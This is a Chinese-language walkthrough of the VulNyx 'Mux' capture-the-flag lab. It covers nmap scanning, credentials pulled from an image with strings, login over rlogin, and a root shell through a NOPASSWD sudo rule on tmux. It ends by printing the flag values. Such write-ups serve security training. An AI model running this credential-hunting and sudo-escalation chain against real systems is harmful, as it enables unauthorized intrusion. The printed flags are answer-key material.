Vlx_Mux

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24                                       
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-28 22:34 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00091s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00051s latency).
MAC Address: 08:00:27:80:51:E7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.62
Host is up (0.00047s latency).
MAC Address: 08:00:27:18:58:3D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.56 seconds

靶机IP：192.168.2.62

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.62                        
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-28 22:34 +0800
Nmap scan report for 192.168.2.62
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
80/tcp  open  http
512/tcp open  exec
513/tcp open  login
514/tcp open  shell
MAC Address: 08:00:27:18:58:3D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.58 seconds

开放端口：80、512、513、514

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p80,512,513,514 192.168.2.62
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-28 22:35 +0800
Nmap scan report for 192.168.2.62
Host is up (0.00082s latency).

PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Monna Lisa
512/tcp open  exec    netkit-rsh rexecd
513/tcp open  login?
514/tcp open  shell   Netkit rshd
MAC Address: 08:00:27:18:58:3D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.51 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100  192.168.2.62
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-28 22:36 +0800
Nmap scan report for 192.168.2.62
Host is up (0.00085s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:18:58:3D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.61 seconds

二、WEB渗透

1、80网站

访问80端口，是一幅图画

下载下来进行查看，找到一个登录凭证：lisa:Gi0c0nd@

┌──(root㉿kali)-[/tmp]
└─# strings image.jpg
....
Rg^E
ofPO8
?\)'
c?3K
w8)P
B^ED:
\Aum
+&Zx
-ya{
XBcBO$
!3Qb
$lhQ
d249rI&
x]3y
lisa:Gi0c0nd@

2、512、513、514

Rexec (remote exec) 是最初的 Berkeley r-services 套件之一（与 rlogin、rsh 等一起）。它提供了一种 远程命令执行 功能，仅通过明文用户名和密码进行身份验证。

可以使用以下命令尝试登录到可访问的远程主机。 rlogin <IP> -l <username>

拿到刚才的凭证进行登录

┌──(root㉿kali)-[/tmp]
└─# rlogin 192.168.2.62 -l lisa
Password: 
lisa@mux:~$ id
uid=1000(lisa) gid=1000(lisa) grupos=1000(lisa)

三、权限提升

查看sudo -l

lisa@mux:~$ sudo -l
Matching Defaults entries for lisa on mux:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lisa may run the following commands on mux:
    (root) NOPASSWD: /usr/bin/tmux

直接进行利用，获取到root权限

lisa@mux:~$ sudo /usr/bin/tmux -c /bin/sh
# id
uid=0(root) gid=0(root) grupos=0(root)

四、查看FLAG

# cat /root/root.txt /home/lisa/user.txt
bcb441bf0878dca6f6d4d2c7787c6f4b
be2034f028ebe41244687a8498c7cd3d